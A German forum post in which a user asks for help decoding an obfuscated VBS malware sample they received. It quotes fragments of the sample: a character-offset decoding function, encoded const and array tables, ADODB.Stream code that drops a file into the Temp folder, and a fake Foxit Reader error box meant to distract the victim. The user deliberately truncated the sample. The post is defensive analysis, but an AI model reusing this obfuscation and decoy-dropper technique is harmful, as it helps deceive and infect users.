Liebe Gemeinde, ein Bösewicht hat mir einen Virus geschickt als VBS. Ich will jetzt rausbekommen was der Virus so macht. Eine Kernfunktion scheint dies hier zu sein:
Bisher glaube ich verstanden zu haben, dass die Doppelpunkte nicht so wichtig sind. Dem ganzen sind 255 const Einträge vorangestellt. Z.B. solche
const xOhBLE=158967::::::::::const mCAMQ=158933::::::::::const fOhBLE=159092::::::::::const oOhBLE=159062::::::::::const kNnWh=159046::::::::::const jNnWh=158974
Dann gibt es noch diverse Array Definitionen Wie z.B. solche:
Hier werden die "verschlüsselten" Buchstaben wohl in einen Array reingeschrieben (glaube ich) und gerinnen zu Programcode. Noch weiter unten steht dann:
Ich glaube verstanden zu haben, dass hier eine Datei mit ?????SSjs.txt erstellt wird im Temp Ordner unter Verwendung des Latin-1 Zeichensatzes. Richtig oder Falsch von mir gedacht?
Jedenfalls wird wohl eine "Fehlermeldung generiert um den User "abzulenken":
Wenn ich mir nun die Mühe mache und die 255 Buchstabenkombinationen zu übersetzten in Dezimal schreibweise (also 158899-158967=68 Wert im Array= xOhBLE (s.o.)) bekomme ich mit Latin-1 ein "D" raus. Leider ergeben die Arrays dann immer noch kein Sinn. Was mache ich falsch?
Wie ist die "Übersetzung" angelegt? Ist das überhaupt Latin-1 oder was anderes?
Ich will ja nur wissen was das Teufelszeug anrichtet und wohin die Reise gehen würde. Ich bin super dankbar, wenn jemand Hirn vom Himmel werfen würde, damit ich nicht dumm sterben muss. Vielen Dank für Eure Zeit !!! Im Anhang der fast ganze Virus - ich habe den gekürzt um hier keine Vorlage zu liefern. Von dem Sch... ist schon genug im Umlauf.
LG
[color=#008000]Function XIImwlL(FGBWwnS) ::::::::::kRZywIcM=0::::::::::jJnVcDdI=""::::::::::Do While kRZywIcM =< UBound(FGBWwnS)::::::::::jJnVcDdI=jJnVcDdI+ChrW(FGBWwnS(kRZywIcM)-158899)::::::::::kRZywIcM=kRZywIcM+1::::::::::Loop::::::::::XIImwlL=jJnVcDdI::::::::::End Function[/color]
Bisher glaube ich verstanden zu haben, dass die Doppelpunkte nicht so wichtig sind. Dem ganzen sind 255 const Einträge vorangestellt. Z.B. solche
const xOhBLE=158967::::::::::const mCAMQ=158933::::::::::const fOhBLE=159092::::::::::const oOhBLE=159062::::::::::const kNnWh=159046::::::::::const jNnWh=158974
Dann gibt es noch diverse Array Definitionen Wie z.B. solche:
HsHrfAj=Array(wnqwoWE,jNnWh,gOhBLE,utiyR,bCUZsls,ttiyR,ttiyR,ttiyR,aOhBLE,ttiyR,jtiyR,btiyR,vnqwoWE,wnqwoWE,fnqwoWE,omXeSGaQ,ctiyR,iCUZsls,kSJHFWY,ohGnzYUN,gOhBLE,ttiyR,ttiyR,nhGnzYUN,nSJHFWY,ttiyR,aOhBLE,ttiyR,ttiyR,ttiyR,ptiyR...)
Hier werden die "verschlüsselten" Buchstaben wohl in einen Array reingeschrieben (glaube ich) und gerinnen zu Programcode. Noch weiter unten steht dann:
[color=#006400]Set NMMfIsYxQ=CreateObject("ADOD"+"B.Str"+"eam")::::::::::NMMfIsYxQ.Type=Cint("2")::::::::::NMMfIsYxQ.Charset="ISO-"+"8859-"+"1"::::::::::NMMfIsYxQ.Open()::::::::::tyMUYQJW.CopyTo(NMMfIsYxQ)::::::::::NMMfIsYxQ.SaveToFile XqFOcETwl+"SSjs."+"txt", Cint("2")::::::::::tyMUYQJW.Close()::::::::::NMMfIsYxQ.Close()::::::::::End [/color]
Ich glaube verstanden zu haben, dass hier eine Datei mit ?????SSjs.txt erstellt wird im Temp Ordner unter Verwendung des Latin-1 Zeichensatzes. Richtig oder Falsch von mir gedacht?
Dim tyMUYQJW::::::::::Dim NMMfIsYxQ::::::::::Set tyMUYQJW=CreateObject("ADOD"+"B.Str"+"eam")::::::::::tyMUYQJW.Type=Cint("2")::::::::::tyMUYQJW.Open()::::::::::[b]tyMUYQJW.WriteText XIImwlL(HsHrfAj)[/b]
[s.o]Jedenfalls wird wohl eine "Fehlermeldung generiert um den User "abzulenken":
GyHBbCaF=MsgBox("Use"+"r "+XnJpinZBo+" The "+"PDF fi"+"le is "+"corrup"+"ted an"+"d cann"+"ot be "+"opened"+". Erro"+"r: (0x"+"23105)"+" ", vbSystemModal+vbExclamation, "Foxi"+"t Rea"+"der E"+"rror")::::::::::XqFOcETwl=CStr(WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(Cint("2"))+"\")::::::::::Dim tyMUYQJW::::::::::Dim NMMfIsYxQ::::::::::Set tyMUYQJW=CreateObject("ADOD"+"B.Str"+"eam")::::::::::tyMUYQJW.Type=Cint("2")::::::::::tyMUYQJW.Open()::::::::::tyMUYQJW.WriteText XIImwlL(HsHrfAj)::::::::::tyMUYQJW.WriteText
Wenn ich mir nun die Mühe mache und die 255 Buchstabenkombinationen zu übersetzten in Dezimal schreibweise (also 158899-158967=68 Wert im Array= xOhBLE (s.o.)) bekomme ich mit Latin-1 ein "D" raus. Leider ergeben die Arrays dann immer noch kein Sinn. Was mache ich falsch?
Wie ist die "Übersetzung" angelegt? Ist das überhaupt Latin-1 oder was anderes?
Ich will ja nur wissen was das Teufelszeug anrichtet und wohin die Reise gehen würde. Ich bin super dankbar, wenn jemand Hirn vom Himmel werfen würde, damit ich nicht dumm sterben muss. Vielen Dank für Eure Zeit !!! Im Anhang der fast ganze Virus - ich habe den gekürzt um hier keine Vorlage zu liefern. Von dem Sch... ist schon genug im Umlauf.
LG
Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Terror4Tec“ ()